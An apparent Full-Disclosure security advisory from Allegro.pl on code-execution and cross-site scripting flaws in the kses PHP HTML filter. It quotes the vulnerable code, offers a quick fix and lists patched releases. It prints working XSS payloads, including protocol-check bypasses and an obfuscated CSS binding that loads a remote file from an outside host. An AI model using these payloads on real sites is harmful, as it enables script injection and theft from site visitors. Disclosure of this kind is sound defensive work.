Vulnerabilities in kses-based HTML filters



Vulnerabilities in kses-based HTML filters
==========================================

During internal code review performed by Allegro.pl, some weaknesses
were discovered in kses - PHP HTML/XHTML filter. HTML filters using or
based on kses are part of many popular projects, including WordPress,
Moodle, Drupal, eGroupWare, Dokeos, PHP-Nuke, Geeklog and others. Issues
found range from cross-site scripting to code execution, depending on
implementation.

Kses filters HTML by whitelisting allowed tags, attributes, and
protocols in attribute values. Additionally, it normalizes HTML entities
and performs a few blacklist checks. This approach makes it much more
reliable as a defence against XSS than a typical blacklist filter. Kses
is no longer mantained since 2005, and multiple projects that use it
developed their own versions. In most cases, these implementations share
the same vulnerabilites.


Quote from kses code:
function kses_bad_protocol_once($string, $allowed_protocols)
###############################################################################
# This function searches for URL protocols at the beginning of $string, while
# handling whitespace and HTML entities.
###############################################################################
{
return preg_replace('/^((&[^;]*;|[\sA-Za-z0-9])*)'.
'(:|:|&#[Xx]3[Aa];)\s*/e',
'kses_bad_protocol_once2("\\1", $allowed_protocols)',
$string);
} # function kses_bad_protocol_once


1. PHP code execution
This vulnerability is caused by unsafe preg_replace() with "e" modifier
and backreference between double quotes. It's exploitable if kses
attribute cleaning functions are called without previous entities
normalization. This is not a standard way of using kses, but such
implementations exist in widely deployed software.
Example:
--- stripped ---

2. Cross site scripting - protocol checks bypass
This vulnerability is caused by insufficient protocol checks in
attribute values. By injecting byte 08 (Firefox) or 0B (Opera) at the
beginning of attribute value, it is possible to bypass
kses_bad_protocol_once2() call.
Examples (partially urlencoded for readability):
(Opera) <img src="%0Bjavascript:alert(document.domain)">
(Firefox) <a href='%08data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>

3. Cross site scripting - allowed attributes
In some implementations, style attribute is allowed. As kses is not
designed to deal with XSS inside CSS, such configurations are
vulnerable, unless additional checks are added. In reality, code added
for cleaning CSS usually does not solve this problem in sufficient
degree.
Example:
(Firefox) <a style=" ;\2d\6d\6f&#92;7a\2d\62\69\6e\64\69\6e\67: \75\72\6c(&#92;68\74\74\70\3a&#92;2F\2F\68\61\2E&#92;63\6B\65\72\73\2E\6F&#92;72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73&#92;73)" href="http://example.com";>test</a>


Solution
========

Sample quick-fix for 1 and (assuming previous entities normalization) 2:
function kses_bad_protocol_once($string, $allowed_protocols)
###############################################################################
# This function searches for URL protocols at the beginning of $string, while
# handling whitespace and HTML entities.
###############################################################################
{
$string2 = preg_split('/:|&#58;|&#x3a;/i', $string, 2);
if(isset($string2[1]) && !preg_match('%/\?%',$string2[0]))
{
$string = kses_bad_protocol_once2($string2[0],$allowed_protocols)
.trim($string2[1]);
}
return $string;
} # function kses_bad_protocol_once

Another option would be to change HTML filter and use some actively
supported library. There are two such filters with kses compatibility
mode:
- HTML Purifier, http://htmlpurifier.org/
basic kses compatibility wrapper available at
http://htmlpurifier.org/svnroot/htmlpurifier/trunk/library/HTMLPurifier.kses.php
- htmLawed,
http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php

HTML Purifier has an advantage of proper CSS validation and secure
default settings, so it's a preferred solution.


Fixed software
==============
Dokeos 1.8.4 SP3, http://www.dokeos.com/download/dokeos-1.8.4-SP3.zip
eGroupWare 1.4.003, http://www.egroupware.org/download
WordPress 2.5, http://wordpress.org/download/
Moodle 1.9, http://download.moodle.org/


Regards,
Łukasz Pilorz, Allegro.pl



Relevant Pages

  • [Full-disclosure] Vulnerabilities in kses-based HTML filters
    ... Vulnerabilities in kses-based HTML filters ... based on kses are part of many popular projects, including WordPress, ... This vulnerability is caused by unsafe preg_replacewith "e" modifier ...
    (Full-Disclosure)
  • [ANNOUNCE] kses 0.2.1
    ... kses is an HTML/XHTML filter written in PHP. ... It removes all unwanted HTML ... no matter how malformed HTML input you give it. ... * It will understand and process whitespace correctly. ...
    (Full-Disclosure)
  • [Full-Disclosure] [ANNOUNCE] kses 0.2.1
    ... kses is an HTML/XHTML filter written in PHP. ... It removes all unwanted HTML ... no matter how malformed HTML input you give it. ... * It will understand and process whitespace correctly. ...
    (Full-Disclosure)
  • [ANNOUNCE] kses 0.2.1
    ... kses is an HTML/XHTML filter written in PHP. ... It removes all unwanted HTML ... no matter how malformed HTML input you give it. ... * It will understand and process whitespace correctly. ...
    (Bugtraq)
  • HTML mail - hypatheticaly speaking, of course...
    ... I know this doesn't particularly pertain to FreeBSD, ... I started a while back on a set of filters to convert html, ... I found that trying to create the filters was a severe pain in the ... relaying limited to the two desktops. ...
    (freebsd-questions)